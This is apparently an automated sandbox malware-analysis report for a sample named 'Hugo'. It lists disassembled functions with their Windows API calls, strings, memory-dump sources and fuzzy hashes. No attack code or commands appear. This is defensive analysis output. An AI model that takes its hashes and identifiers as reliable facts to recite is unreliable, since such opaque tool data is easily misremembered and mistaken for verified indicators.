Opcode Fuzzy Hash: bf9df756c22046cada9880ada31d94ce6f52763708d73954779d8e82181fd8d7
Instruction Fuzzy Hash: 4F716775A00219DFDF10EF94D995A9EBBF4BF08310F048499E856AB251CB74AD82DB90

Function 00F77B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F77B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F77BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F77BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F77C36

Strings

DllGetClassObject, xrefs: 00F77BA9

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: f3f76bc280e4ac64783b31ae0ee05646786bf5eb652c82e285436913baf629e9
Instruction ID: 8bea2599f4a74d2fc9145397bc7c4a678c4087e7b503a9e9ac1a91d01677b7f1
Opcode Fuzzy Hash: f3f76bc280e4ac64783b31ae0ee05646786bf5eb652c82e285436913baf629e9
Instruction Fuzzy Hash: 214190B1614304DFDB16EF24C884A9A7BB9EF48314B14C0AAED0ADF245D7B0D940EBA1

Function 00FA4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA48D1
IsMenu.USER32(?), ref: 00FA48E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FA492E
DrawMenuBar.USER32 ref: 00FA4941

Strings

0, xrefs: 00FA4825

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 03c92efb58d3d22238c27b1c7dc5acd9945a3f4589a74f0c0da17a4dd16fbebd
Instruction ID: e27e9afe172d6b00eb962f3bffe4045fc82ff94369bcb5456e724b4cf7e20f29
Opcode Fuzzy Hash: 03c92efb58d3d22238c27b1c7dc5acd9945a3f4589a74f0c0da17a4dd16fbebd
Instruction Fuzzy Hash: C44189B5A00209EFDB10CF51D884EABBBB9FF4A324F044029E946AB250D770ED50EF60

Function 00F7272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F727B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F727C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00F727F6

Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A

Strings

ComboBox, xrefs: 00F7273D
ListBox, xrefs: 00F72772

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 009fb232e50712f98c959e55923d96580c3177c365b55cc69e5d8e41959b8e29
Instruction ID: 4363eb312d83649044f993e07453d95dfbb838762fa2408f74bc6d389e6909ba
Opcode Fuzzy Hash: 009fb232e50712f98c959e55923d96580c3177c365b55cc69e5d8e41959b8e29
Instruction Fuzzy Hash: 23210772900104BFDB09AB64DC46DFE77B8DF453A0F14812BF426971E1CB39494AF652

Function 00FA39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FA3A29
LoadLibraryW.KERNEL32(?), ref: 00FA3A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FA3A45
DestroyWindow.USER32(?), ref: 00FA3A4D

Strings

SysAnimate32, xrefs: 00FA3A04

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: b4dafc30a4edeca899495c11aeeeed3765e6d0d439aedf8ff5bfd202cbd07b3a
Instruction ID: cc96b17594b7e9237ab4dfa191a64bede2cdc15593ff3c52c2523bab65f9201d
Opcode Fuzzy Hash: b4dafc30a4edeca899495c11aeeeed3765e6d0d439aedf8ff5bfd202cbd07b3a
Instruction Fuzzy Hash: 4F219AB5A00219AFEF109F64DC80FAB77AEEB4B374F105218FA91961A0D775CD81B760

Function 00F350DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F3508E,?,?,00F3502E,?,00FD98D8,0000000C,00F35185,?,00000002), ref: 00F350FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F35110
FreeLibrary.KERNEL32(00000000,?,?,?,00F3508E,?,?,00F3502E,?,00FD98D8,0000000C,00F35185,?,00000002,00000000), ref: 00F35133

Strings

CorExitProcess, xrefs: 00F35108
mscoree.dll, xrefs: 00F350F6

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1c90b1e493486153d135f320de83ca21bfd72b9ce79a18a15f196967a47c1e43
Instruction ID: 9539a9f1a0d22bd2540fe62305543d98281751054ae68275c9d2bdfbc157b881
Opcode Fuzzy Hash: 1c90b1e493486153d135f320de83ca21bfd72b9ce79a18a15f196967a47c1e43
Instruction Fuzzy Hash: F9F0C234A0020CBFDB10AF94DC19BEDBFB8EF44B26F000065F806A2160CF749E40EA91

Function 00F1663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F1668B,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F1664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F1665C
FreeLibrary.KERNEL32(00000000,?,?,00F1668B,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F1666E

Strings

kernel32.dll, xrefs: 00F16642
Wow64DisableWow64FsRedirection, xrefs: 00F16656

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: a2cec29c179a913fbb3956c2af8864e0b1090243031a3c024054d4ed0fab6188
Instruction ID: ca45844b4157f3e78bbadd7d7d6692caa21b17fff8d6d2a697e27ec3b77b4536
Opcode Fuzzy Hash: a2cec29c179a913fbb3956c2af8864e0b1090243031a3c024054d4ed0fab6188
Instruction Fuzzy Hash: 6EE0CD75A0252217A2111725BC0CBDE75299F83F3AB090215FC01D6210DF60CD41A4E5

Function 00F16607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F55657,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F16610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F16622
FreeLibrary.KERNEL32(00000000,?,?,00F55657,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F16635

Strings

kernel32.dll, xrefs: 00F16609
Wow64RevertWow64FsRedirection, xrefs: 00F1661C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 2424e0b99a2e101085e45ef630b2d32d5da0a39872cae7afdb9b8755c5e3a184
Instruction ID: 92f962c375d68626a208ad71affbe7177c824600db047a55f8b8ba6080a72c1f
Opcode Fuzzy Hash: 2424e0b99a2e101085e45ef630b2d32d5da0a39872cae7afdb9b8755c5e3a184
Instruction Fuzzy Hash: 0BD05B75A1253557523227257C18ACF7B15DFD3F353090115F806E6524CF60CD41F5D9

Function 00F83306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F835C4
DeleteFileW.KERNEL32(?), ref: 00F83646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F8365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F8366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F8367F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 219cf0bcaf2fffa7ea661c5dd0453d0f44fa52809a27673934eba4819ed4246c
Instruction ID: 17035614e22d185bc3a4bfb7e678a309b0d544b45c596c3cceaf720cfffea8a8
Opcode Fuzzy Hash: 219cf0bcaf2fffa7ea661c5dd0453d0f44fa52809a27673934eba4819ed4246c
Instruction Fuzzy Hash: C0B15E72E00119ABDF11EBA4CC85EDEBBBDEF49710F0040A6F509E7151EA34AB44EB61

Function 00F9ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00F9AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F9AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F9AEC8
CloseHandle.KERNEL32(?), ref: 00F9B09D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 6feba908422b4f2c7ef7fe47938ee2c6b1137fc3948f303b1d888d6e8a41cb04
Instruction ID: 72c773a46523ea4104cdf0881a2284ca105e6299c33f0544d8b2dd4278b648ca
Opcode Fuzzy Hash: 6feba908422b4f2c7ef7fe47938ee2c6b1137fc3948f303b1d888d6e8a41cb04
Instruction Fuzzy Hash: AFA1C271A043019FE720DF24D886F6AB7E1AF84720F54885CF9999B392CB75EC41DB81

Function 00F9C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9C10E,?,?), ref: 00F9D415
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D451
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4C8
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F9C5C3
RegCloseKey.ADVAPI32(?,?), ref: 00F9C606
RegCloseKey.ADVAPI32(00000000), ref: 00F9C613

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 980d9de031be8ac92b7b9497940f36f78cc87d905d8e40eb442d5827406a4583
Instruction ID: 44bd313053e52d1b11dc2bcef53804162e9b89cf57721b9fe1897f6d874cebf9
Opcode Fuzzy Hash: 980d9de031be8ac92b7b9497940f36f78cc87d905d8e40eb442d5827406a4583
Instruction Fuzzy Hash: EC61B371608241EFD714DF14C890E6ABBE5FF84318F54859CF09A8B292CB35ED46DB92

Function 00F7ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F7D7CD,?), ref: 00F7E714

Part of subcall function 00F7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F7D7CD,?), ref: 00F7E72D

Part of subcall function 00F7EAB0: GetFileAttributesW.KERNEL32(?,00F7D840), ref: 00F7EAB1

lstrcmpiW.KERNEL32(?,?), ref: 00F7ED8A
MoveFileW.KERNEL32(?,?), ref: 00F7EDC3
_wcslen.LIBCMT ref: 00F7EF02
_wcslen.LIBCMT ref: 00F7EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F7EF67

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: e38fd4a74ae04fb3019544258d84520d1e4853555f69e6374de0bbd9d2126be6
Instruction ID: fc746d43e575643d16cc776f85bc4cd9cbbdb77fd079a33f7bab1a5e2dfe7721
Opcode Fuzzy Hash: e38fd4a74ae04fb3019544258d84520d1e4853555f69e6374de0bbd9d2126be6
Instruction Fuzzy Hash: 685160B24083859BC724DBA4DC919DBB3ECAF89350F40492FF28983151EF74A6889766

Function 00F79517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F79534
VariantClear.OLEAUT32 ref: 00F795A5
VariantClear.OLEAUT32 ref: 00F79604
VariantClear.OLEAUT32(?), ref: 00F79677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F796A2

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 69c0e725d6beafdc34b90873243c7a808b50455def016cd0049c0d9b20957ec3
Instruction ID: 7a45827c1acad63480a5079e9a6d64b289b243a51d75652a8feecb3167602fc2
Opcode Fuzzy Hash: 69c0e725d6beafdc34b90873243c7a808b50455def016cd0049c0d9b20957ec3
Instruction Fuzzy Hash: A95149B5A04219EFCB14CF58C884AAAB7F9FF8D314B15855AE90ADB310E770E911CF90

Function 00F89540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F895F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F8961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F89677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F8969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F896A4

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 07f56daacb93ecb705c1965775b1135a2711d68791689a0c96447953d8392a82
Instruction ID: c3406de3e7a4ceade33d5907d075e39880903269dfe357de68a5896aa80c3950
Opcode Fuzzy Hash: 07f56daacb93ecb705c1965775b1135a2711d68791689a0c96447953d8392a82
Instruction Fuzzy Hash: 54513D75A002199FCB05EF55C881AAEBBF5FF49314F088058E849AB362DB75ED41DB90

Function 00F99941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00F9999D
GetProcAddress.KERNEL32(00000000,?), ref: 00F99A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00F99A49
GetProcAddress.KERNEL32(00000000,?), ref: 00F99A8F
FreeLibrary.KERNEL32(00000000), ref: 00F99AAF

Part of subcall function 00F2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F81A02,?,7644E610), ref: 00F2F9F1
Part of subcall function 00F2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F70354,00000000,00000000,?,?,00F81A02,?,7644E610,?,00F70354), ref: 00F2FA18

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 015a42bbc86f2c752912030065689037c7d366e5d4223ff2c3359f379b2eb90b
Instruction ID: b24c1e9aa54dfb12e344213df67624a25810e2636b4a5ad6dbd0153aa5b7fb9a
Opcode Fuzzy Hash: 015a42bbc86f2c752912030065689037c7d366e5d4223ff2c3359f379b2eb90b
Instruction Fuzzy Hash: CA518D35A04205DFDB05DF68C4819ADBBF0FF09324B0580A8E80A9B722D775ED86DF81

Function 00FA75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FA766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00FA7682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FA76AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F8B5BE,00000000,00000000), ref: 00FA76D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FA76FF

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 4209200db7d4c2f2f27cd2443cd7659cdf3d14a268e37d140929af415541eccc
Instruction ID: 99a83f84141b2f06fcc66ea63d03245abc8bd48052b38d6cc648fd9dc2f6221b
Opcode Fuzzy Hash: 4209200db7d4c2f2f27cd2443cd7659cdf3d14a268e37d140929af415541eccc
Instruction Fuzzy Hash: 2141D3B5E08608AFD729AF2CCC48FAA7B65EB47360F150224F815A73E1D770AD41FA50

Function 00F423C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F42433
_free.LIBCMT ref: 00F42453

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
